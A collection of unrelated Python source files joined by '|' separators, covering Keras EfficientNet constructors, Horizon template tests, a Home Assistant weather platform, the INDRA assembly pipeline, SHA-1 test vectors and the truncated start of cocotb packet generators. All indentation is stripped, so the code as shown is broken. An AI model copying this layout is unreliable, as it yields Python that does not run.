if 0 < se_ratio <= 1:
filters_se = max(1, int(filters_in * se_ratio))
se = layers.GlobalAveragePooling2D(name=name + 'se_squeeze')(x)
se = layers.Reshape((1, 1, filters), name=name + 'se_reshape')(se)
se = layers.Conv2D(
filters_se,
1,
padding='same',
activation=activation,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'se_reduce')(
se)
se = layers.Conv2D(
filters,
1,
padding='same',
activation='sigmoid',
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'se_expand')(se)
x = layers.multiply([x, se], name=name + 'se_excite')
# Output phase
x = layers.Conv2D(
filters_out,
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'project_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'project_bn')(x)
if id_skip and strides == 1 and filters_in == filters_out:
if drop_rate > 0:
x = layers.Dropout(
drop_rate, noise_shape=(None, 1, 1, 1), name=name + 'drop')(x)
x = layers.add([x, inputs], name=name + 'add')
return x
@keras_export('keras.applications.efficientnet.EfficientNetB0',
'keras.applications.EfficientNetB0')
def EfficientNetB0(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.0,
1.0,
224,
0.2,
model_name='efficientnetb0',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB1',
'keras.applications.EfficientNetB1')
def EfficientNetB1(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.0,
1.1,
240,
0.2,
model_name='efficientnetb1',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB2',
'keras.applications.EfficientNetB2')
def EfficientNetB2(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.1,
1.2,
260,
0.3,
model_name='efficientnetb2',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB3',
'keras.applications.EfficientNetB3')
def EfficientNetB3(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.2,
1.4,
300,
0.3,
model_name='efficientnetb3',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB4',
'keras.applications.EfficientNetB4')
def EfficientNetB4(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.4,
1.8,
380,
0.4,
model_name='efficientnetb4',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB5',
'keras.applications.EfficientNetB5')
def EfficientNetB5(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.6,
2.2,
456,
0.4,
model_name='efficientnetb5',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB6',
'keras.applications.EfficientNetB6')
def EfficientNetB6(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.8,
2.6,
528,
0.5,
model_name='efficientnetb6',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB7',
'keras.applications.EfficientNetB7')
def EfficientNetB7(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
2.0,
3.1,
600,
0.5,
model_name='efficientnetb7',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
EfficientNetB0.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB0')
EfficientNetB1.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB1')
EfficientNetB2.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB2')
EfficientNetB3.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB3')
EfficientNetB4.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB4')
EfficientNetB5.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB5')
EfficientNetB6.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB6')
EfficientNetB7.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB7')
@keras_export('keras.applications.efficientnet.preprocess_input')
def preprocess_input(x, data_format=None): # pylint: disable=unused-argument
return x
@keras_export('keras.applications.efficientnet.decode_predictions')
def decode_predictions(preds, top=5):
return imagenet_utils.decode_predictions(preds, top=top)
decode_predictions.__doc__ = imagenet_utils.decode_predictions.__doc__
|
import math
import numpy
def run(self, Input):
number_of_steps = 16
self.time = numpy.zeros(number_of_steps)
uniform = Input["uniform"]
self.out = numpy.zeros(number_of_steps)
for i in range(len(self.time)):
self.time[i] = 0.25*i
time = self.time[i]
self.out[i] = math.sin(time+uniform)
|
import re
from django.conf import settings
from django.template import Context # noqa
from django.template import Template # noqa
from django.utils.text import normalize_newlines # noqa
from horizon.test import helpers as test
from horizon.test.test_dashboards.cats.dashboard import Cats # noqa
from horizon.test.test_dashboards.cats.kittens.panel import Kittens # noqa
from horizon.test.test_dashboards.dogs.dashboard import Dogs # noqa
from horizon.test.test_dashboards.dogs.puppies.panel import Puppies # noqa
def single_line(text):
"""Quick utility to make comparing template output easier."""
return re.sub(' +',
' ',
normalize_newlines(text).replace('\n', '')).strip()
class TemplateTagTests(test.TestCase):
"""Test Custom Template Tag."""
def render_template_tag(self, tag_name, tag_require=''):
tag_call = "{%% %s %%}" % tag_name
return self.render_template(tag_call, tag_require)
def render_template(self, template_text, tag_require='', context={}):
"""Render a Custom Template to string."""
template = Template("{%% load %s %%} %s"
% (tag_require, template_text))
return template.render(Context(context))
def test_site_branding_tag(self):
"""Test if site_branding tag renders the correct setting."""
rendered_str = self.render_template_tag("site_branding", "branding")
self.assertEqual(settings.SITE_BRANDING, rendered_str.strip(),
"tag site_branding renders %s" % rendered_str.strip())
def test_size_format_filters(self):
size_str = ('5|diskgbformat', '10|diskgbformat',
'5555|mb_float_format', '80|mb_float_format',
'.5|mbformat', '0.005|mbformat', '0.0005|mbformat')
expected = u' 5GB 10GB 5.4GB 80MB 512KB 5KB 524Bytes '
text = ''
for size_filter in size_str:
text += '{{' + size_filter + '}} '
rendered_str = self.render_template(tag_require='sizeformat',
template_text=text)
self.assertEqual(expected, rendered_str)
def test_size_format_filters_with_string(self):
size_str = ('"test"|diskgbformat', '"limit"|mb_float_format',
'"no limit"|mbformat')
expected = u' test limit no limit '
text = ''
for size_filter in size_str:
text += '{{' + size_filter + '}} '
rendered_str = self.render_template(tag_require='sizeformat',
template_text=text)
self.assertEqual(expected, rendered_str)
def test_truncate_filter(self):
ctx_string = {'val1': 'he',
'val2': 'hellotrunc',
'val3': 'four'}
text = ('{{test.val1|truncate:1}}#{{test.val2|truncate:4}}#'
'{{test.val3|truncate:10}}')
expected = u' h#h...#four'
rendered_str = self.render_template(tag_require='truncate_filter',
template_text=text,
context={'test': ctx_string})
self.assertEqual(expected, rendered_str)
def test_quota_filter(self):
ctx_string = {'val1': 100,
'val2': 1000,
'val3': float('inf')}
text = ('{{test.val1|quota:"TB"}}#{{test.val2|quota}}#'
'{{test.val3|quota}}')
expected = u' 100 TB Available#1000 Available#No Limit'
rendered_str = self.render_template(tag_require='horizon',
template_text=text,
context={'test': ctx_string})
self.assertEqual(expected, rendered_str)
def test_horizon_main_nav(self):
text = "{% horizon_main_nav %}"
expected = """
<div class='clearfix'>
<ul class=\"nav nav-tabs\">
<li>
<a href=\"/cats/\" tabindex='1'>Cats</a>
</li>
<li>
<a href=\"/dogs/\" tabindex='1'>Dogs</a>
</li>
</ul></div>"""
rendered_str = self.render_template(tag_require='horizon',
template_text=text,
context={'request': self.request})
self.assertEqual(single_line(rendered_str), single_line(expected))
|
"""Platform for retrieving meteorological data from Environment Canada."""
import datetime
import re
from env_canada import ECData # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.weather import (
ATTR_FORECAST_CONDITION,
ATTR_FORECAST_PRECIPITATION_PROBABILITY,
ATTR_FORECAST_TEMP,
ATTR_FORECAST_TEMP_LOW,
ATTR_FORECAST_TIME,
PLATFORM_SCHEMA,
WeatherEntity,
)
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, TEMP_CELSIUS
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt
CONF_FORECAST = "forecast"
CONF_ATTRIBUTION = "Data provided by Environment Canada"
CONF_STATION = "station"
def validate_station(station):
"""Check that the station ID is well-formed."""
if station is None:
return
if not re.fullmatch(r"[A-Z]{2}/s0000\d{3}", station):
raise vol.error.Invalid('Station ID must be of the form "XX/s0000###"')
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Inclusive(CONF_LATITUDE, "latlon"): cv.latitude,
vol.Inclusive(CONF_LONGITUDE, "latlon"): cv.longitude,
vol.Optional(CONF_FORECAST, default="daily"): vol.In(["daily", "hourly"]),
}
)
ICON_CONDITION_MAP = {
"sunny": [0, 1],
"clear-night": [30, 31],
"partlycloudy": [2, 3, 4, 5, 22, 32, 33, 34, 35],
"cloudy": [10],
"rainy": [6, 9, 11, 12, 28, 36],
"lightning-rainy": [19, 39, 46, 47],
"pouring": [13],
"snowy-rainy": [7, 14, 15, 27, 37],
"snowy": [8, 16, 17, 18, 25, 26, 38, 40],
"windy": [43],
"fog": [20, 21, 23, 24, 44],
"hail": [26, 27],
}
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Environment Canada weather."""
if config.get(CONF_STATION):
ec_data = ECData(station_id=config[CONF_STATION])
else:
lat = config.get(CONF_LATITUDE, hass.config.latitude)
lon = config.get(CONF_LONGITUDE, hass.config.longitude)
ec_data = ECData(coordinates=(lat, lon))
add_devices([ECWeather(ec_data, config)])
class ECWeather(WeatherEntity):
"""Representation of a weather condition."""
def __init__(self, ec_data, config):
"""Initialize Environment Canada weather."""
self.ec_data = ec_data
self.platform_name = config.get(CONF_NAME)
self.forecast_type = config[CONF_FORECAST]
@property
def attribution(self):
"""Return the attribution."""
return CONF_ATTRIBUTION
@property
def name(self):
"""Return the name of the weather entity."""
if self.platform_name:
return self.platform_name
return self.ec_data.metadata.get("location")
@property
def temperature(self):
"""Return the temperature."""
if self.ec_data.conditions.get("temperature", {}).get("value"):
return float(self.ec_data.conditions["temperature"]["value"])
if self.ec_data.hourly_forecasts[0].get("temperature"):
return float(self.ec_data.hourly_forecasts[0]["temperature"])
return None
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def humidity(self):
"""Return the humidity."""
if self.ec_data.conditions.get("humidity", {}).get("value"):
return float(self.ec_data.conditions["humidity"]["value"])
return None
@property
def wind_speed(self):
"""Return the wind speed."""
if self.ec_data.conditions.get("wind_speed", {}).get("value"):
return float(self.ec_data.conditions["wind_speed"]["value"])
return None
@property
def wind_bearing(self):
"""Return the wind bearing."""
if self.ec_data.conditions.get("wind_bearing", {}).get("value"):
return float(self.ec_data.conditions["wind_bearing"]["value"])
return None
@property
def pressure(self):
"""Return the pressure."""
if self.ec_data.conditions.get("pressure", {}).get("value"):
return 10 * float(self.ec_data.conditions["pressure"]["value"])
return None
@property
def visibility(self):
"""Return the visibility."""
if self.ec_data.conditions.get("visibility", {}).get("value"):
return float(self.ec_data.conditions["visibility"]["value"])
return None
@property
def condition(self):
"""Return the weather condition."""
icon_code = None
if self.ec_data.conditions.get("icon_code", {}).get("value"):
icon_code = self.ec_data.conditions["icon_code"]["value"]
elif self.ec_data.hourly_forecasts[0].get("icon_code"):
icon_code = self.ec_data.hourly_forecasts[0]["icon_code"]
if icon_code:
return icon_code_to_condition(int(icon_code))
return ""
@property
def forecast(self):
"""Return the forecast array."""
return get_forecast(self.ec_data, self.forecast_type)
def update(self):
"""Get the latest data from Environment Canada."""
self.ec_data.update()
def get_forecast(ec_data, forecast_type):
"""Build the forecast array."""
forecast_array = []
if forecast_type == "daily":
half_days = ec_data.daily_forecasts
if half_days[0]["temperature_class"] == "high":
forecast_array.append(
{
ATTR_FORECAST_TIME: dt.now().isoformat(),
ATTR_FORECAST_TEMP: int(half_days[0]["temperature"]),
ATTR_FORECAST_TEMP_LOW: int(half_days[1]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(half_days[0]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
half_days[0]["precip_probability"]
),
}
)
half_days = half_days[2:]
else:
half_days = half_days[1:]
for day, high, low in zip(range(1, 6), range(0, 9, 2), range(1, 10, 2)):
forecast_array.append(
{
ATTR_FORECAST_TIME: (
dt.now() + datetime.timedelta(days=day)
).isoformat(),
ATTR_FORECAST_TEMP: int(half_days[high]["temperature"]),
ATTR_FORECAST_TEMP_LOW: int(half_days[low]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(half_days[high]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
half_days[high]["precip_probability"]
),
}
)
elif forecast_type == "hourly":
hours = ec_data.hourly_forecasts
for hour in range(0, 24):
forecast_array.append(
{
ATTR_FORECAST_TIME: dt.as_local(
datetime.datetime.strptime(hours[hour]["period"], "%Y%m%d%H%M")
).isoformat(),
ATTR_FORECAST_TEMP: int(hours[hour]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(hours[hour]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
hours[hour]["precip_probability"]
),
}
)
return forecast_array
def icon_code_to_condition(icon_code):
"""Return the condition corresponding to an icon code."""
for condition, codes in ICON_CONDITION_MAP.items():
if icon_code in codes:
return condition
return None
|
import json
import logging
import inspect
from .decorators import pipeline_functions, register_pipeline
from indra.statements import get_statement_by_name, Statement
logger = logging.getLogger(__name__)
class AssemblyPipeline():
"""An assembly pipeline that runs the specified steps on a given set of
statements.
Ways to initialize and run the pipeline (examples assume you have a list
of INDRA Statements stored in the `stmts` variable.)
>>> from indra.statements import *
>>> map2k1 = Agent('MAP2K1', db_refs={'HGNC': '6840'})
>>> mapk1 = Agent('MAPK1', db_refs={'HGNC': '6871'})
>>> braf = Agent('BRAF')
>>> stmts = [Phosphorylation(map2k1, mapk1, 'T', '185'),
... Phosphorylation(braf, map2k1)]
1) Provide a JSON file containing the steps, then use the classmethod
`from_json_file`, and run it with the `run` method on a list of statements.
This option allows storing pipeline versions in a separate file and
reproducing the same results. All functions referenced in the JSON file
have to be registered with the @register_pipeline decorator.
>>> import os
>>> path_this = os.path.dirname(os.path.abspath(__file__))
>>> filename = os.path.abspath(
... os.path.join(path_this, '..', 'tests', 'pipeline_test.json'))
>>> ap = AssemblyPipeline.from_json_file(filename)
>>> assembled_stmts = ap.run(stmts)
2) Initialize a pipeline with a list of steps and run it with the `run`
method on a list of statements. All functions referenced in steps have to
be registered with the @register_pipeline decorator.
>>> steps = [
... {"function": "filter_no_hypothesis"},
... {"function": "filter_grounded_only",
... "kwargs": {"score_threshold": 0.8}}
... ]
>>> ap = AssemblyPipeline(steps)
>>> assembled_stmts = ap.run(stmts)
3) Initialize an empty pipeline and append/insert the steps one by one.
Provide a function and its args and kwargs. For arguments that
require calling a different function, use the RunnableArgument class. All
functions referenced here have to be either imported and passed as function
objects or registered with the @register_pipeline decorator and passed as
function names (strings). The pipeline built this way can be optionally
saved into a JSON file. (Note that this example requires indra_world
to be installed.)
>>> from indra.tools.assemble_corpus import *
>>> from indra_world.ontology import load_world_ontology
>>> from indra_world.belief import get_eidos_scorer
>>> ap = AssemblyPipeline()
>>> ap.append(filter_no_hypothesis)
>>> ap.append(filter_grounded_only)
>>> ap.append(run_preassembly,
... belief_scorer=RunnableArgument(get_eidos_scorer),
... ontology=RunnableArgument(load_world_ontology))
>>> assembled_stmts = ap.run(stmts)
>>> ap.to_json_file('filename.json')
Parameters
----------
steps : list[dict]
A list of dictionaries representing steps in the pipeline. Each step
should have a 'function' key and, if appropriate, 'args' and 'kwargs'
keys. Arguments can be simple values (strings, integers, booleans,
lists, etc.) or can be functions themselves. In case an argument is a
function or a result of another function, it should also be
represented as a dictionary of a similar structure. If a function
itself is an argument (and not its result), the dictionary should
contain a key-value pair {'no_run': True}. If an argument is a type
of a statement, it should be represented as a dictionary {'stmt_type':
<name of a statement type>}.
"""
def __init__(self, steps=None):
# This import is here to avoid circular imports
# It is enough to import one function to get all registered functions
from indra.tools.assemble_corpus import filter_grounded_only
from indra.ontology.bio import bio_ontology
from indra.preassembler.grounding_mapper.gilda import ground_statements
from indra.preassembler.custom_preassembly import agent_grounding_matches
self.steps = steps if steps else []
@classmethod
def from_json_file(cls, filename):
"""Create an instance of AssemblyPipeline from a JSON file with
steps."""
with open(filename, 'r') as f:
steps = json.load(f)
ap = AssemblyPipeline(steps)
return ap
def to_json_file(self, filename):
"""Save AssemblyPipeline to a JSON file."""
with open(filename, 'w') as f:
json.dump(self.steps, f, indent=1)
def run(self, statements, **kwargs):
"""Run all steps of the pipeline.
Parameters
----------
statements : list[indra.statements.Statement]
A list of INDRA Statements to run the pipeline on.
**kwargs : kwargs
It is recommended to define all arguments for the steps functions
in the steps definition, but it is also possible to provide some
external objects (if it is not possible to provide them as a step
argument) as kwargs to the entire pipeline here. One should be
cautious to avoid kwargs name clashes between multiple functions
(this value will be provided to all functions that expect an
argument with the same name). To overwrite this value in other
functions, provide it explicitly in the corresponding steps kwargs.
Returns
-------
list[indra.statements.Statement]
The list of INDRA Statements resulting from running the pipeline
on the list of input Statements.
"""
logger.info('Running the pipeline')
for step in self.steps:
statements = self.run_function(step, statements, **kwargs)
return statements
def append(self, func, *args, **kwargs):
"""Append a step to the end of the pipeline.
Args and kwargs here can be of any type. All functions referenced here
have to be either imported and passed as function objects or
registered with @register_pipeline decorator and passed as function
names (strings). For arguments that require calling a different
function, use RunnableArgument class.
Parameters
----------
func : str or function
A function or the string name of a function to add to the pipeline.
args : args
Args that are passed to func when calling it.
kwargs : kwargs
Kwargs that are passed to func when calling it.
"""
if inspect.isfunction(func):
func_name = func.__name__
if func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
func_name = func
else:
raise TypeError('Should be a function object or a string')
new_step = self.create_new_step(func_name, *args, **kwargs)
self.steps.append(new_step)
def insert(self, ix, func, *args, **kwargs):
"""Insert a step to any position in the pipeline.
Args and kwargs here can be of any type. All functions referenced here
have to be either imported and passed as function objects or
registered with @register_pipeline decorator and passed as function
names (strings). For arguments that require calling a different
function, use RunnableArgument class.
Parameters
----------
func : str or function
A function or the string name of a function to add to the pipeline.
args : args
Args that are passed to func when calling it.
kwargs : kwargs
Kwargs that are passed to func when calling it.
"""
if inspect.isfunction(func):
func_name = func.__name__
if func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
func_name = func
else:
raise TypeError('Should be a function object or a string')
new_step = self.create_new_step(func_name, *args, **kwargs)
self.steps.insert(ix, new_step)
def create_new_step(self, func_name, *args, **kwargs):
"""Create a dictionary representing a new step in the pipeline.
Parameters
----------
func_name : str
The string name of a function to create as a step.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
dict
A dict structure representing a step in the pipeline.
"""
assert self.get_function_from_name(func_name)
new_step = {'function': func_name}
if args:
new_step['args'] = [jsonify_arg_input(arg) for arg in args]
if kwargs:
new_step['kwargs'] = {
k: jsonify_arg_input(v) for (k, v) in kwargs.items()}
return new_step
@staticmethod
def get_function_parameters(func_dict):
"""Retrieve a function name and arguments from function dictionary.
Parameters
----------
func_dict : dict
A dict structure representing a function and its args and kwargs.
Returns
-------
tuple of str, list and dict
A tuple with the following elements: the name of the function,
the args of the function, and the kwargs of the function.
"""
func_name = func_dict['function']
args = func_dict.get('args', [])
kwargs = func_dict.get('kwargs', {})
return func_name, args, kwargs
@staticmethod
def get_function_from_name(name):
"""Return a function object by name if available or raise exception.
Parameters
----------
name : str
The name of the function.
Returns
-------
function
The function that was found based on its name. If not found,
a NotRegisteredFunctionError is raised.
"""
if name in pipeline_functions:
return pipeline_functions[name]
raise NotRegisteredFunctionError('%s is not registered' % name)
@staticmethod
def run_simple_function(func, *args, **kwargs):
"""Run a simple function and return the result.
Simple here means a function all arguments of which are simple values
(do not require extra function calls).
Parameters
----------
func : function
The function to call.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
object
Any value that the given function returns.
"""
statements = kwargs.pop('statements', None)
if statements is not None:
return func(statements, *args, **kwargs)
return func(*args, **kwargs)
def run_function(self, func_dict, statements=None, **kwargs):
"""Run a given function and return the results.
For each of the arguments, if it requires an extra
function call, recursively call the functions until we get a simple
function.
Parameters
----------
func_dict : dict
A dict representing the function to call, its args and kwargs.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
object
Any value that the given function returns.
"""
func_name, func_args, func_kwargs = self.get_function_parameters(
func_dict)
func = self.get_function_from_name(func_name)
logger.info('Calling %s' % func_name)
new_args = []
new_kwargs = {}
for arg in func_args:
arg_value = self.get_argument_value(arg)
new_args.append(arg_value)
for k, v in func_kwargs.items():
kwarg_value = self.get_argument_value(v)
new_kwargs[k] = kwarg_value
if statements is not None:
new_kwargs['statements'] = statements
if kwargs:
for k, v in kwargs.items():
if k not in new_kwargs and k in inspect.getargspec(func).args:
new_kwargs[k] = v
return self.run_simple_function(func, *new_args, **new_kwargs)
@staticmethod
def is_function(argument, keyword='function'):
"""Check if an argument should be converted to a specific object type,
e.g. a function or a statement type.
Parameters
----------
argument : dict or other object
The argument is a dict, its keyword entry is checked, and if it is
there, we return True, otherwise we return False.
keyword : Optional[str]
The keyword to check if it's there if the argument is a dict.
Default: function
"""
if not isinstance(argument, dict):
return False
if keyword not in argument:
return False
return True
def get_argument_value(self, arg_json):
"""Get a value of an argument from its json version."""
if self.is_function(arg_json, 'function'):
# Argument is a function
if arg_json.get('no_run', False):
value = self.get_function_from_name(arg_json['function'])
# Argument is a result of a function
else:
value = self.run_function(arg_json)
# Argument is a statement type
elif self.is_function(arg_json, 'stmt_type'):
value = get_statement_by_name(arg_json.get('stmt_type'))
# Argument is a simple value (str, int, boolean, etc.)
else:
value = arg_json
return value
def __len__(self):
return len(self.steps)
def __iter__(self):
return iter(self.steps)
class NotRegisteredFunctionError(Exception):
pass
class RunnableArgument():
"""Class representing arguments generated by calling a function.
RunnableArguments should be used as args or kwargs in AssemblyPipeline
`append` and `insert` methods.
Parameters
----------
func : str or function
A function or a name of a function to be called to generate argument
value.
"""
def __init__(self, func, *args, **kwargs):
if inspect.isfunction(func):
self.func_name = func.__name__
if self.func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
self.func_name = func
else:
raise TypeError('Should be a function object or a string')
self.args = args
self.kwargs = kwargs
def to_json(self):
"""Jsonify to standard AssemblyPipeline step format."""
json_dict = {'function': self.func_name}
new_args = []
new_kwargs = {}
for arg in self.args:
new_args.append(jsonify_arg_input(arg))
for k, v in self.kwargs.items():
new_kwargs[k] = jsonify_arg_input(v)
if new_args:
json_dict['args'] = new_args
if new_kwargs:
json_dict['kwargs'] = new_kwargs
return json_dict
def jsonify_arg_input(arg):
"""Jsonify user input (in AssemblyPipeline `append` and `insert` methods)
into a standard step json."""
if isinstance(arg, RunnableArgument):
return arg.to_json()
# If a function object or name of a function is provided, we assume it
# does not have to be run (function itself is argument).
if inspect.isfunction(arg):
func_name = arg.__name__
if func_name not in pipeline_functions:
register_pipeline(arg)
return {'function': func_name, 'no_run': True}
if isinstance(arg, str) and arg in pipeline_functions:
return {'function': arg, 'no_run': True}
# For some functions Statement type has to be argument
if inspect.isclass(arg) and issubclass(arg, Statement):
return {'stmt_type': arg.__name__}
# Argument is a simple value and can be stored as provided
return arg
|
""" sha1Hash_test.py
Unit tests for sha1.py
"""
from crypto.hash.sha1Hash import SHA1
import unittest
import struct
assert struct.calcsize('!IIIII') == 20, '5 integers should be 20 bytes'
class SHA1_FIPS180_TestCases(unittest.TestCase):
""" SHA-1 tests from FIPS180-1 Appendix A, B and C """
def testFIPS180_1_Appendix_A(self):
""" APPENDIX A. A SAMPLE MESSAGE AND ITS MESSAGE DIGEST """
hashAlg = SHA1()
message = 'abc'
message_digest = 0xA9993E36L, 0x4706816AL, 0xBA3E2571L, 0x7850C26CL, 0x9CD0D89DL
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix A test Failed'
def testFIPS180_1_Appendix_B(self):
""" APPENDIX B. A SECOND SAMPLE MESSAGE AND ITS MESSAGE DIGEST """
hashAlg = SHA1()
message = 'abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq'
message_digest = 0x84983E44L, 0x1C3BD26EL, 0xBAAE4AA1L, 0xF95129E5L, 0xE54670F1L
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix B test Failed'
def testFIPS180_1_Appendix_C(self):
""" APPENDIX C. A THIRD SAMPLE MESSAGE AND ITS MESSAGE DIGEST
Let the message be the binary-coded form of the ASCII string which consists
of 1,000,000 repetitions of "a". """
hashAlg = SHA1()
message = 1000000*'a'
message_digest = 0x34AA973CL, 0xD4C4DAA4L, 0xF61EEB2BL, 0xDBAD2731L, 0x6534016FL
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix C test Failed'
def _toBlock(binaryString):
""" Convert binary string to blocks of 5 words of uint32() """
return [uint32(word) for word in struct.unpack('!IIIII', binaryString)]
def _toBString(block):
""" Convert block (5 words of 32 bits to binary string """
return ''.join([struct.pack('!I',word) for word in block])
if __name__ == '__main__':
# Run the tests from the command line
unittest.main()
|
from datetime import datetime
from django.contrib.contenttypes.models import ContentType
from actstream.managers import ActionManager, stream
class MyActionManager(ActionManager):
@stream
def testfoo(self, object, time=None):
if time is None:
time = datetime.now()
return object.actor_actions.filter(timestamp__lte = time)
@stream
def testbar(self, verb):
return self.filter(verb=verb)
|
from neo.io.basefromrawio import BaseFromRaw
from neo.rawio.plexonrawio import PlexonRawIO
class PlexonIO(PlexonRawIO, BaseFromRaw):
"""
Class for reading the old data format from Plexon
acquisition system (.plx)
Note that Plexon now use a new format PL2 which is NOT
supported by this IO.
Compatible with versions 100 to 106.
Other versions have not been tested.
"""
_prefered_signal_group_mode = 'group-by-same-units'
def __init__(self, filename):
PlexonRawIO.__init__(self, filename=filename)
BaseFromRaw.__init__(self, filename)
|
''' Copyright (c) 2013 Potential Ventures Ltd
Copyright (c) 2013 SolarFlare Communications Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Potential Ventures Ltd,
SolarFlare Communications Inc nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''
"""
Collection of Ethernet Packet generators to use for testdata generation
Most generators take the keyword argument "payload" which can be
used to control the payload contents if required. Defaults to random data.
"""
import random
from scapy.all import Ether, IP, UDP
import logging
logging.getLogger("scapy").setLevel(logging.ERROR)
from cocotb.decorators import public
from cocotb.generators.byte import get_bytes, random_data
_default_payload = random_data
@public
def udp_all_sizes(max_size=1500, payload=_default_payload()):
